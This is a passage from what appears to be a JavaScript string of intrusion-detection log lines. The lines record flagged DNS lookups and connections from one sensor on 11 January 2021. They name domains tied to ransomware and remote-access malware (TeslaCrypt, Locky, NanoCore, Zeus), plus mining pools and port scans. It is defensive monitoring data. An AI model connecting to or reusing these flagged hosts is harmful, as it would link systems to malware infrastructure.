    '"2021-01-11 01:43:14.798359" r2d2 2.200.104.32 54556 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:43:14.633843" r2d2 192.168.30.231 54556 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:43:14.634252" r2d2 2.200.104.32 54556 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:43:14.633849" r2d2 192.168.30.231 54556 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:43:25.825311" r2d2 2.200.110.233 65266 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:43:28.456529" r2d2 10.43.192.103 56410 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:43:32.000307" r2d2 2.200.108.59 23519,23521,23522,23525,23529,23532,33244,33652,34892,34992,35786,36152,38186,38790,39164,39202,39508,39532,39717,39718,39720,41178,41382,42800,43588,43812,44854,44986,45554,45882,45884,46798,47746,48174,49202,51530,51554,52662,54124,54354,59160,59294,60100,60228,60438,60632,60634 77.53.81.105 21,5133,7664,8422,9091,9297,13888,19369,21975,24259,24604,30951,31012,31159,31422,31865,33103,35849,36355,36487,40062,44458,44760,44846,45260,46448,47798,52055,54367,55767,56755,58193,58333,58865,60714,61726,64134 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:43:31.000596" r2d2 2.200.108.59 23503,23505,23511,23512,23513,23514,23516,23517,23518,23520,23522,23524,23527,23530,23531,34864,34892,34992,35880,36118,36298,37524,38162,38186,38690,38892,38970,39164,39202,39508,39715,39717,39721,39722,39723,39724,41178,42598,42834,43436,43604,43934,44450,44494,44986,45020,45554,45666,45879,45884,46816,47008,47036,47832,47840,47854,50428,50998,51554,51666,51744,52420,52672,53044,53500,53952,54286,54354,55844,56032,56360,57028,58824,59082,59266,59294,59808,59944,60028,60298,60634 77.53.81.105 21,6315,6750,7197,7978,9091,9297,11641,12216,14558,14828,18669,18943,20074,21975,22048,23763,24259,24604,24880,25487,26484,31572,31865,32945,33103,33110,34585,34862,35249,38135,38145,40062,40455,40545,43532,43721,44760,45760,46516,47798,48026,48056,48152,49595,49772,51574,52055,52609,54334,55591,58333,58629,59259,59301,59303,62032,63792,64134 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:43:31.000531" r2d2 2.200.108.59 23503,23504,23505,23506,23508,23513,23514,23515,23516,23519,23521,23523,23524,23526,23527,23528,23529,23530,23532,32780,33196,33922,34800,34864,34946,35880,36152,37524,37526,38050,38110,38790,38892,39572,39718,39723,41382,41682,42598,42834,43436,43588,43604,44204,44854,45178,45666,45879,45880,45881,45883,45885,45886,46166,47008,47036,47652,47746,47836,48174,48234,48326,48378,50428,50872,51666,52374,52382,52420,52672,52908,53036,53114,53500,53600,53814,54046,54124,54596,54636,54676,55844,56032,56100,56346,56678,58800,58824,58912,59082,59118,59160,59626,59724,60028,60100,60438,60632 77.53.81.105 21,5133,6315,6768,7197,7664,8833,10048,10689,10953,11773,12021,12604,13209,13888,14558,17647,18669,18905,18943,19669,20356,20585,20819,20984,22012,22048,24308,25487,25718,26019,29811,31422,33110,34398,34585,34862,35249,35849,36487,36980,38780,39304,40455,40753,43532,43721,44424,44458,46128,47996,48056,52127,53510,53725,54334,54367,55767,55903,56755,57173,57847,58629,59301,59303,59421,60452,60714,62032,62051,63792,65489 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:43:38.499354" r2d2 2.200.110.232 64340 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:43:38.530248" r2d2 2.200.110.233 64756 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:43:40.522593" r2d2 10.43.192.103 56417 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:43:43.380931" r2d2 2.200.110.232 49405 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:43:34.000582" r2d2 2.200.108.59 32780,34800,34946,34952,37326,39572,40998,43480,46304,46708,47836,48326,48760,49868,51608,52052,53436,53600,54124,54468,55928 77.53.81.105 7740,8833,10048,12604,16016,17932,25695,26019,34398,36168,37458,37465,39304,40753,46979,49510,53439,54842,55903,56084,60647 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:43:46.559880" r2d2 10.43.192.103 56418 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:43:58.627119" r2d2 10.43.192.103 56436 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:44:01.268631" r2d2 2.200.110.232 64058 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:44:01.269884" r2d2 2.200.107.146 25019 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:44:01.311165" r2d2 2.200.110.233 65452 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:44:10.693956" r2d2 10.43.192.103 56441 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:44:16.725362" r2d2 10.43.192.103 56448 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:44:26.255476" r2d2 10.3.160.42 13680 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:44:26.355570" r2d2 10.3.160.42 13680 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:44:26.458250" r2d2 10.3.160.42 13680 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:44:26.655226" r2d2 10.3.160.42 13680 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:44:26.955479" r2d2 10.3.160.42 13680 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:44:27.355139" r2d2 10.3.160.42 13680 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:44:28.455093" r2d2 10.3.160.42 13680 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:44:34.810334" r2d2 10.43.192.103 56485 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:44:43.394488" r2d2 2.200.110.232 63699 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:44:43.395741" r2d2 2.200.110.232 64594 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 01:44:43.398026" r2d2 2.200.110.232 64710 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:44:46.862494" r2d2 10.43.192.103 56501 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:44:47.342775" r2d2 2.200.110.233 65232 2.200.107.169 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 01:44:48.554200" r2d2 2.200.110.233 64820 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:44:52.902163" r2d2 10.43.192.103 56502 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:44:59.607189" r2d2 2.200.110.232 64258 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:45:04.979666" r2d2 10.43.192.103 56504 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:45:23.065550" r2d2 10.43.192.103 56518 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:45:35.111466" r2d2 10.43.192.103 56542 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:45:47.165005" r2d2 10.43.192.103 56563 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:45:58.553243" r2d2 2.200.110.232 65002 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:45:58.555471" r2d2 2.200.107.146 11196 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:45:58.587737" r2d2 2.200.110.233 65503 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:45:59.239956" r2d2 10.43.192.103 56565 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:46:05.268633" r2d2 10.43.192.103 56566 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:46:17.335285" r2d2 10.43.192.103 56568 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:46:35.468739" r2d2 10.43.192.103 56571 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:46:43.384488" r2d2 2.200.110.232 64010 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:46:47.530998" r2d2 10.43.192.103 56573 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:46:53.571696" r2d2 10.43.192.103 56574 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:46:59.620993" r2d2 2.200.110.232 64100 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:46:59.622935" r2d2 2.200.107.146 40409 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:47:00.676469" r2d2 10.1.19.42 59245 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:47:07.235074" r2d2 2.200.110.232 64613 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:47:07.271801" r2d2 2.200.110.233 64154 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:47:08.597194" r2d2 2.200.110.233 63939 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:47:11.675033" r2d2 10.43.192.103 56577 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:47:17.718575" r2d2 10.43.192.103 56578 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:47:29.788348" r2d2 10.43.192.103 56580 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:47:38.627288" r2d2 10.44.70.211 51546 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:47:47.615231" r2d2 2.200.107.169 53 2.200.110.233 64079 UDP DNS (www.thatsmyview).net "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:47:47.615238" r2d2 2.200.107.169 53 2.200.110.233 64079 UDP DNS (www.thatsmyview).net "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:47:47.682622" r2d2 2.200.107.168 53 2.200.110.232 64056 UDP DNS (www.thatsmyview).net "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:47:47.682618" r2d2 2.200.107.168 53 2.200.110.232 64056 UDP DNS (www.thatsmyview).net "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:47:47.905936" r2d2 10.43.192.103 56583 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:47:59.608548" r2d2 2.200.110.232 65058 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:47:59.970586" r2d2 10.43.192.103 56586 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:48:12.038335" r2d2 10.43.192.103 56588 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:48:15.055185" r2d2 2.200.105.226 58851 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:48:15.055062" r2d2 2.200.105.226 58851 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:48:16.490634" r2d2 2.200.105.226 58479 208.67.222.123 53 UDP DNS (pool-de).supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:48:18.611357" r2d2 2.200.110.232 65242 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:48:18.641550" r2d2 2.200.110.233 65433 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:48:30.151348" r2d2 10.43.192.103 56591 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:48:42.225528" r2d2 10.43.192.103 56593 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:48:48.258401" r2d2 10.43.192.103 56594 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:48:56.971357" r2d2 10.1.19.42 59246 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:49:00.342305" r2d2 10.43.192.103 56596 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:49:18.475782" r2d2 10.43.192.103 56599 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:49:28.651569" r2d2 2.200.107.146 16673 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:49:28.649715" r2d2 2.200.110.232 63512 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:49:28.680962" r2d2 2.200.110.233 63608 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:49:36.571722" r2d2 10.43.192.103 56625 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:49:43.381950" r2d2 2.200.110.232 63941 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:49:45.038687" r2d2 178.17.174.14 38030 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16; FunWebProducts; .NET4.0C; .NET4.0E; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; BRI/2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:49:48.617990" r2d2 10.43.192.103 56647 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:49:59.609550" r2d2 2.200.110.232 65306 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 01:49:59.610747" r2d2 2.200.107.146 39140 199.19.57.1 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 01:50:00.679170" r2d2 10.43.192.103 56660 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:50:18.768088" r2d2 10.43.192.103 56663 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:50:24.818429" r2d2 10.43.192.103 56665 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:50:26.825031" r2d2 10.3.160.42 13683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:50:27.028602" r2d2 10.3.160.42 13683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:50:27.227581" r2d2 10.3.160.42 13683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:50:27.524738" r2d2 10.3.160.42 13683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:50:27.924368" r2d2 10.3.160.42 13683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:50:28.424647" r2d2 10.3.160.42 13683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:50:29.027269" r2d2 10.3.160.42 13683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:50:30.865344" r2d2 10.43.192.103 56666 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:50:37.281668" r2d2 2.200.110.232 49441 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:50:37.283586" r2d2 2.200.107.146 12689 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:50:37.313600" r2d2 2.200.110.233 64174 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:50:38.683351" r2d2 2.200.107.146 52205 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:50:38.681705" r2d2 2.200.110.232 63994 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:50:38.714420" r2d2 2.200.110.233 63793 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:50:42.930208" r2d2 10.43.192.103 56668 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:50:53.385757" r2d2 10.1.19.42 59290 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:50:56.608438" r2d2 10.43.192.103 56671 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:50:59.607084" r2d2 2.200.110.232 49211 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:51:43.396064" r2d2 2.200.110.232 64684 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:51:43.397692" r2d2 2.200.107.146 21503 185.24.64.42 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:51:43.398176" r2d2 2.200.110.232 64216 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:51:47.455225" r2d2 2.200.110.233 49324 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:51:47.475110" r2d2 2.200.110.233 65270 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 01:51:47.685765" r2d2 2.200.110.233 64849 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:51:48.725731" r2d2 2.200.110.233 64900 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:51:53.359867" r2d2 2.200.110.233 64628 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:51:59.628118" r2d2 2.200.110.232 64732 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 01:52:43.381936" r2d2 2.200.110.232 65339 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:52:43.383636" r2d2 2.200.107.146 32207 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:52:43.879553" r2d2 2.200.97.1 53344 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:52:57.076095" r2d2 2.200.110.232 49216 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:52:57.077474" r2d2 2.200.107.146 36656 192.54.112.30 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:52:57.121173" r2d2 2.200.110.233 65208 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:52:57.430773" r2d2 2.200.110.233 64397 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:52:57.747562" r2d2 2.200.110.233 49309 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 01:52:58.726750" r2d2 2.200.110.232 65055 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:52:58.728079" r2d2 2.200.107.146 1902 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:52:58.754984" r2d2 2.200.110.233 64464 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:52:59.625125" r2d2 2.200.110.232 49222 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:53:06.772141" r2d2 2.200.110.232 63613 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:53:06.774114" r2d2 2.200.107.146 47502 46.101.179.64 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:53:07.279428" r2d2 2.200.110.232 65309 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 01:53:07.280993" r2d2 2.200.107.146 40497 205.251.196.50 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 01:53:16.769350" r2d2 2.200.107.146 6532 77.72.229.253 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:53:16.768171" r2d2 2.200.110.233 63391 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:53:24.907823" r2d2 2.200.107.146 49948 46.101.179.64 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:53:24.906033" r2d2 2.200.110.232 64579 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:53:25.401411" r2d2 178.17.174.14 49738 2.200.109.24 80 TCP UA "Google Chrome(/5.0 \\(Windows NT 6.1; rv:20.0\\) Gecko/20100101 Google Chrome/20.0 AlexaToolbar/alxf-2.18)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:53:32.000364" r2d2 2.200.108.59 23865,23870,23874,23877,23882,23883,23884,23885,23887,23889,33010,33152,33478,33594,33988,34546,34832,35100,35116,35122,35772,36086,38030,39108,39392,39905,39906,39907,39908,39988,40276,40328,40668,40796,41100,41524,41680,41714,43216,43892,45300,46070,47692,49452,51906,52664,52926,53148,54086,55000,56770,56968,59104,59810,60544,60948 77.53.81.105 21,7606,12200,12500,16642,16648,18455,18716,19007,20434,20495,21164,21355,23105,23132,26859,28612,28655,35382,36031,37456,38537,43212,43642,47632,47677,53491,54963,55115,55307,58414,58504,58748,59221,59784,61884,62121,64252,64479,64804,65026,65372 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:53:33.000585" r2d2 2.200.108.59 23881,23882,23887,23889,23890,33356,33674,33942,33988,34546,35116,35422,35474,36726,36798,38264,38754,38936,38966,39050,39070,39300,39438,39748,39860,39908,39909,39988,40328,40902,41046,41714,42144,42404,42714,43892,44062,44624,45770,46071,46072,46844,47508,48254,48854,51264,51712,51906,53744,53844,55238,55254,55430,56968,57204,57876,58564,58964,59176,59342,59534,59538,59810,59946,60268,60344 77.53.81.105 21,5067,6017,6440,6598,10269,10391,10885,10940,12200,13527,15428,15749,16847,18716,18752,19938,21355,21952,23132,26315,28114,28947,29906,29962,31188,31641,31694,33434,33674,33871,34010,35190,36706,37456,39022,40167,40192,42522,42778,43212,43711,43725,43827,46091,46334,52249,53271,53768,55115,58621,58748,59784,60235,61916,64314,64403,64804 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:53:32.000022" r2d2 2.200.108.59 23866,23867,23868,23869,23871,23873,23874,23876,23878,23880,23881,23884,23886,23888,23890,23891,33010,33152,33594,34766,34960,35100,35122,35422,35474,35762,35772,36006,36086,36216,36798,36896,37418,37458,37734,38030,38264,38966,39070,39548,39586,39642,39748,39905,39982,40094,40276,40668,40796,40994,41096,41100,41104,41304,41680,41776,42404,42714,43216,44102,44918,45300,46067,46069,46072,46510,47586,48040,48686,50622,50820,51476,51844,51882,52068,52664,52712,52926,53036,53086,53884,54122,54584,54686,55000,55724,56402,56770,56976,57066,57204,57492,58564,58722,59342,59534,59930,60268,60948 77.53.81.105 21,5227,6017,6089,7606,9818,11443,12500,13527,13576,14536,14633,15428,16412,16642,16648,17611,18237,18519,18744,20434,20463,20495,21160,21242,21723,21952,24428,24801,25157,25545,26315,26800,26859,26987,27184,28147,28612,29723,31873,34010,35190,36031,36189,36706,38537,40558,42364,42522,43642,43711,43827,44938,46091,46168,47632,47677,47783,48158,49045,49632,50528,52766,52889,54691,55307,56328,56947,57102,57398,58414,58504,58604,59221,62742,64252,64314,64403,64479,64849,65372 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:53:43.393486" r2d2 2.200.110.232 64308 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
